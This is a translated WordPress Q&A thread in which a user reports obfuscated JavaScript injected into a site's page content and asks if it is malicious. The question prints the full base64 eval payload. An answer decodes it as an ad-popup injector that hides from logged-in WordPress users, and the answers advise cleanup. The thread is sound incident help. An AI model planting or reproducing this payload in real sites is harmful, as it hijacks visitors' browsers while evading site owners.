编辑网站中奇怪的乱七八糟的JavaScript被黑客入侵了?

时间:2018-01-25 作者:tillinberlin

客户网站以“enfold”主题运行,该主题具有“enfold Advanced Layout Editor”。目前该编辑器已损坏-可能是由于旧版本与php或其他原因。无论如何,为了解决这个问题,我查看了实际的数据库表和页面内容下方的大约20行空行,我发现了这个看起来非常奇怪的JavaScript代码:

<script> </script> <script> </script> <script> </script>
<script type="text/javascript">
var GVCNLUQKSK = atob(\'dmFyIEJLWE9TWkdWT1kgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEzIC0gMywgMTI3IC0gOSwgMTA1IC0gOCwgMTE4IC0gNCwgMzQgLSAyLCAxMTAgLSAzLCAxMDcgLSA2LCAxMjcgLSA2LCAzNCAtIDIsIDY3IC0gNiwgMzQgLSAyLCA0OCAtIDksIDg4IC0gNCwgNzYgLSA3LCA3OSAtIDUsIDc0IC0gNCwgMTIxIC0gOSwgNzggLSA0LCAxMDcgLSA3LCAxMjUgLSAzLCA3NSAtIDIsIDEyMiAtIDYsIDQwIC0gMSwgNjggLSA5LCAxMSAtIDEsIDEyNiAtIDgsIDk5IC0gMiwgMTE5IC0gNSwgMzkgLSA3LCAxMDcgLSA2LCAxMTMgLSAzLCAxMDIgLSAzLCAxMDkgLSA4LCAxMDQgLSA0LCAzMyAtIDEsIDY1IC0gNCwgMzcgLSA1LCA0NCAtIDUsIDc4IC0gNSwgMTA4IC0gMywgOTAgLSA5LCA1NiAtIDQsIDk1IC0gNSwgMTA3IC0gNCwgNjYgLSAxLCA1OSAtIDcsIDc0IC0gOSwgMTExIC0gNywgOTggLSA4LCAxMTkgLSA3LCA4NCAtIDEsIDg5IC0gMSwgODggLSA3LCAxMDcgLSAzLCA3OSAtIDUsIDkxIC0gOCwgODkgLSA0LCA3MSAtIDEsIDgxIC0gNywgMTI2IC0gNywgNzcgLSA4LCA5NCAtIDksIDg1IC0gNSwgOTQgLSA4LCAxMTIgLSAxLCA1NiAtIDUsIDg2IC0gOCwgMTI3IC0gNiwgNjUgLSA5LCAxMTIgLSAyLCA3NSAtIDksIDc1IC0gOCwgNjUgLSA5LCAxMDkgLSA1LCA3NyAtIDcsIDEwNyAtIDIsIDEyMiAtIDMsIDk4IC0gOCwgODUgLSA4LCA4OCAtIDUsIDExOSAtIDQsIDUwIC0gNywgMTA0IC0gNiwgMTExIC0gMywgMTA3IC0gOCwgNjIgLSA5LCA3MCAtIDQsIDEyNiAtIDcsIDExMiAtIDksIDEwNSAtIDIsIDcxIC0gNSwgNjkgLSAyLCA3MiAtIDYsIDEwOCAtIDMsIDkyIC0gMywgNTIgLSAxLCA1MyAtIDQsIDYxIC0gNywgODIgLSAzLCAxMTIgLSA4LCA5MSAtIDIsIDEwNSAtIDYsIDgxIC0gNywgODkgLSAzLCAxMTYgLSA1LCAxMTkgLSA5LCA3NCAtIDEsIDcwIC0gMiwgNTMgLSAxLCA4MCAtIDgsIDY5IC0gMywgNzAgLSAyLCA1NCAtIDIsIDkzIC0gNiwgNzYgLSA3LCAxMjcgLSA2LCAxMjIgLSA3LCA2OSAtIDMsIDgyIC0gOSwgNzYgLSA5LCA2OSAtIDMsIDExNCAtIDksIDkzIC0gNCwgODkgLSA4LCA4NSAtIDgsIDYwIC0gOCwgNzUgLSA5LCA1NCAtIDUsIDU2IC0gNywgMTE3IC0gOSwgODggLSAzLCAxMjcgLSA1LCAxMjQgLSA1LCAxMjEgLSAxLCA4NyAtIDcsIDEwOSAtIDMsIDkzIC0gMywgODMgLSA4LCA5NyAtIDcsIDk0IC0gOSwgMTE2IC0gMSwgODEgLSAyLCA4MCAtIDEsIDEyNyAtIDcsIDg5IC0gNCwgMTI5IC0gOCwgODIgLSA5LCAxMjkgLSA4LCA3OSAtIDIsIDExNCAtIDYsIDc0IC0gNSwgOTIgLSA4LCAxMTYgLSA1LCA4MCAtIDIsIDkzIC0gNywgNzYgLSA5LCAxMDAgLSAxLCA5MiAtIDMsIDEwNyAtIDYsIDEyOCAtIDYsIDk2IC0gNywgNDkgLSA2LCA3OCAtIDQsIDEyNCAtIDUsIDg3IC0gNiwgMTA5IC0gMywgNzAgLSA0LCA1NCAtIDUsIDkzIC0gOCwgMTEzIC0gNiwgNzQgLSA0LCA4NyAtIDMsIDUyIC0gNCwgMTIxIC0gNywgOTEgLSAxLCA3MiAtIDUsIDEyMSAtIDIsIDcwIC0gMiwgMTA1IC0gNywgODYgLSAxLCA1MiAtIDMsIDY5IC0gMywgODIgLSAxLCAxMjkgLSA5LCA3NCAtIDksIDU5IC0gNCwgNzkgLSA1LCAxMTAgLSA0LCA2NSAtIDksIDEyMyAtIDksIDc1IC0gNSwgOTEgLSA4LCA5MCAtIDksIDkwIC0gOSwgODcgLSAxLCA3NCAtIDcsIDc2IC0gNywgODggLSA2LCA4MCAtIDIsIDkxIC0gOCwgNzggLSA4LCAxMDkgLSAyLCA3OCAtIDQsIDEyMCAtIDEsIDY5IC0gNCwgNTkgLSA1LCA3MiAtIDcsIDg4IC0gNiwgODYgLSA1LCAxMTggLSAyLCA4NyAtIDksIDEyOCAtIDYsIDEyMiAtIDMsIDEyMyAtIDgsIDc3IC0gMywgMTA4IC0gMywgNzggLSA0LCA5NiAtIDcsIDg2IC0gNywgMTA5IC0gNSwgOTEgLSAyLCAxMDcgLSA4LCA4MiAtIDgsIDkyIC0gNiwgNTMgLSA0LCAxMTkgLSAxLCA4NiAtIDIsIDEyOCAtIDksIDcwIC0gOSwgNjggLSA3LCA0MiAtIDMsIDYzIC0gNCwgMTEgLSAxLCAxMDMgLSAxLCAxMjUgLSA4LCAxMTcgLSA3LCAxMDUgLSA2LCAxMTkgLSAzLCAxMTQgLSA5LCAxMTggLSA3LCAxMTEgLSAxLCAzNyAtIDUsIDEyNyAtIDcsIDExOSAtIDgsIDExOSAtIDUsIDEwMyAtIDgsIDEwOSAtIDgsIDExNyAtIDcsIDEwMSAtIDIsIDQxIC0gMSwgMTIwIC0gNSwgMTE3IC0gMSwgMTE1IC0gMSwgMTEzIC0gOCwgMTEzIC0gMywgMTExIC0gOCwgNDkgLSA1LCAzMyAtIDEsIDExMyAtIDYsIDEwOCAtIDcsIDEzMCAtIDksIDQyIC0gMSwgMzQgLSAyLCAxMjggLSA1LCAxMyAtIDMsIDM1IC0gMywgNDAgLSA4LCAxMTkgLSAxLCAxMDYgLSA5LCAxMjMgLSA5LCAzNSAtIDMsIDExNyAtIDMsIDEwNyAtIDYsIDExOSAtIDQsIDM1IC0gMywgNjYgLSA1LCAzNiAtIDQsIDQ1IC0gNiwgNDMgLSA0LCA2NyAtIDgsIDE2IC0gNiwgMzYgLSA0LCAzNyAtIDUsIDEwOSAtIDcsIDExMyAtIDIsIDExNiAtIDIsIDM3IC0gNSwgNDkgLSA5LCAxMjYgLSA4LCAxMDEgLSA0LCAxMTUgLSAxLCA0MCAtIDgsIDExMyAtIDgsIDM0IC0gMiwgNzAgLSA5LCA0MCAtIDgsIDUxIC0gMywgNjEgLSAyLCAzNSAtIDMsIDExNCAtIDksIDM4IC0gNiwgNjUgLSA1LCA0MCAtIDgsIDExOSAtIDQsIDEyMiAtIDYsIDExNiAtIDIsIDEwOSAtIDQsIDExMSAtIDEsIDEwOCAtIDUsIDQ3IC0gMSwgMTA5IC0gMSwgMTEwIC0gOSwgMTE2IC0gNiwgMTA3IC0gNCwgMTI0IC0gOCwgMTEyIC0gOCwgNjQgLSA1LCAzNCAtIDIsIDExMCAtIDUsIDQ5IC0gNiwgNDYgLSAzLCA0NiAtIDUsIDQwIC0gOCwgMTMwIC0gNywgMTcgLSA3LCAzOSAtIDcsIDM5IC0gNywgNDEgLSA5LCAzNyAtIDUsIDEyMCAtIDYsIDEwMiAtIDEsIDEyMCAtIDUsIDQwIC0gOCwgNTIgLSA5LCA2MyAtIDIsIDMzIC0gMSwgOTEgLSA4LCAxMTggLSAyLCAxMTggLSA0LCAxMDkgLSA0LCAxMTEgLSAxLCAxMDUgLSAyLCA1MCAtIDQsIDExMSAtIDksIDEyMCAtIDYsIDExNyAtIDYsIDExNiAtIDcsIDY5IC0gMiwgMTA4IC0gNCwgMTAyIC0gNSwgMTIwIC0gNiwgNzMgLSA2LCAxMTMgLSAyLCAxMDEgLSAxLCAxMDYgLSA1LCA0NiAtIDYsIDExOSAtIDQsIDEyMCAtIDQsIDExNiAtIDIsIDEwNyAtIDIsIDExNCAtIDQsIDExMCAtIDcsIDUzIC0gNywgMTAzIC0gNCwgMTA4IC0gNCwgOTggLSAxLCAxMTYgLSAyLCA3NCAtIDcsIDExOSAtIDgsIDEwOCAtIDgsIDEwMyAtIDIsIDY3IC0gMiwgMTE3IC0gMSwgNDYgLSA2LCAxMDggLSAzLCA0NyAtIDYsIDQwIC0gOCwgOTggLSA0LCAxOSAtIDksIDExIC0gMiwgMTMgLSA0LCAxOCAtIDksIDE1IC0gNiwgMTA4IC0gMSwgMTA4IC0gNywgMTI1IC0gNCwgNDggLSAyLCAxMDYgLSA3LCAxMTAgLSA2LCAxMDAgLSAzLCAxMjMgLSA5LCA2OSAtIDIsIDExNyAtIDYsIDEwMSAtIDEsIDEwNSAtIDQsIDY2IC0gMSwgMTI1IC0gOSwgNDUgLSA1LCAxMTAgLSA1LCAzMyAtIDEsIDQ1IC0gOCwgMzggLSA2LCAxMTUgLSA4LCAxMDYgLSA1LCAxMjUgLSA0LCA0OCAtIDIsIDExNyAtIDksIDEwMyAtIDIsIDExMSAtIDEsIDEwOCAtIDUsIDEyNSAtIDksIDEwOCAtIDQsIDQ0IC0gMywgNDkgLSA4LCA2NCAtIDUsIDE3IC0gNywgNDEgLSA5LCAzNCAtIDIsIDEzMiAtIDcsIDEzIC0gMywgMzcgLSA1LCAzOSAtIDcsIDExOSAtIDUsIDEwNCAtIDMsIDExOCAtIDIsIDEyMCAtIDMsIDEyMyAtIDksIDExNSAtIDUsIDM5IC0gNywgMTE3IC0gMywgMTEwIC0gOSwgMTI0IC0gOSwgNjYgLSA3LCAxOCAtIDgsIDEyOSAtIDQsIDE5IC0gOSwgMTIgLSAyLCAxMjQgLSA2LCAxMDYgLSA5LCAxMTYgLSAyLCAzMyAtIDEsIDEwNyAtIDcsIDEwNCAtIDMsIDEwNyAtIDgsIDM5IC0gNywgNjcgLSA2LCA0MCAtIDgsIDEyNyAtIDcsIDExOSAtIDgsIDEyMCAtIDYsIDk2IC0gMSwgMTA0IC0gMywgMTE3IC0gNywgMTAzIC0gNCwgNDMgLSAzLCAxMDMgLSA2LCAxMjIgLSA2LCAxMTcgLSA2LCA5OSAtIDEsIDQ3IC0gNywgMTAzIC0gMiwgMTE5IC0gOSwgMTA2IC0gNywgMTA5IC0gOCwgMTA5IC0gOSwgNDcgLSA2LCA0OCAtIDQsIDM4IC0gNiwgMTE0IC0gNywgMTA5IC0gOCwgMTI3IC0gNiwgNDUgLSA0LCA2MSAtIDIsIDE2IC0gNiwgNDEgLSAxLCAxMTEgLSAxLCAxMDcgLSA2LCAxMjIgLSAzLCA0MSAtIDksIDc1IC0gNSwgMTIzIC0gNiwgMTE3IC0gNywgMTA2IC0gNywgMTE4IC0gMiwgMTA2IC0gMSwgMTE3IC0gNiwgMTE1IC0gNSwgNDMgLSAzLCAxMDMgLSAzLCAxMDkgLSA4LCAxMDYgLSA3LCA0OSAtIDgsIDQyIC0gMSwgNDcgLSA3LCA0NiAtIDUsIDYzIC0gNCwgMTUgLSA1LCAxNCAtIDQpO2V2YWwoQktYT1NaR1ZPWSk7\'); 
eval(GVCNLUQKSK);
</script>   
<script> </script> <script> </script> <script> </script>
…我/我的客户是否应该关心…?!

…或者这就是“高级布局编辑器”所做的…?

非常感谢。

2 个回复
最合适的回答,由SO网友:swissspidy 整理而成

对JavaScript“胡言乱语”的解码表明,这是一个脚本,用于在用户单击某个位置后打开带有广告的弹出窗口。

最重要的是,如果您当前登录,这些弹出窗口将不会显示。这就是为什么这些脚本经常被忽视的原因。

这里有一段经过编辑的摘录:

var t = false;
document.onclick= function(event) {
  if (t) {
    return;
  }
  t = true;  

  var cookie = document.cookie || \'\';
  if (cookie.indexOf(\'wordpress_logged\') !== -1
      || cookie.indexOf(\'wp-settings\') !== -1
      || cookie.indexOf(\'wordpress_test\') !== -1) {
    return;
  }

  if ( event === undefined) event= window.event;
  var target= \'target\' in event? event.target : event.srcElement;
  var win = window.open(\'http://...---redacted---\', \'_blank\');
  win.focus();
};
所以是的,你应该担心。有一个My site was hacked FAQ 您应该阅读WordPress Codex,以便采取适当的后续步骤。

SO网友:janh

不,编辑不是这样做的,是的,你应该担心。

恢复到干净的备份,使您的核心和插件保持最新。

更改WordPress和FTP/SFTP密码。确保没有可访问WP后端的受感染客户端计算机。

安装WordFence之类的插件可能会有所帮助。这并不能阻止所有攻击的发生或成功,但它会阻止其中一些攻击(大部分是自动攻击,占绝对多数),而且它可以帮助您识别哪些文件被感染。

结束
标签: javascript   visual-editor   hacked   小码农  

相关推荐

OnClick帖子标题在管理区域的javascript文件不起作用

我试图加载一个弹出窗口,点击管理区的帖子标题,然后通过元查询获取数据,并在弹出窗口中显示,但在控制台中显示错误,js函数未定义。看起来文件没有正确包含,我尝试了很多方法,但仍然是一样的。我正在尝试将该文件包含在插件名“tasks”中,js文件位于tasks/assets/js/functins.jshttp://prntscr.com/gv2ea2这里我包括脚本文件add_action(\'wp_enqueue_scripts\',\'tasks_js_file_func\'); &#x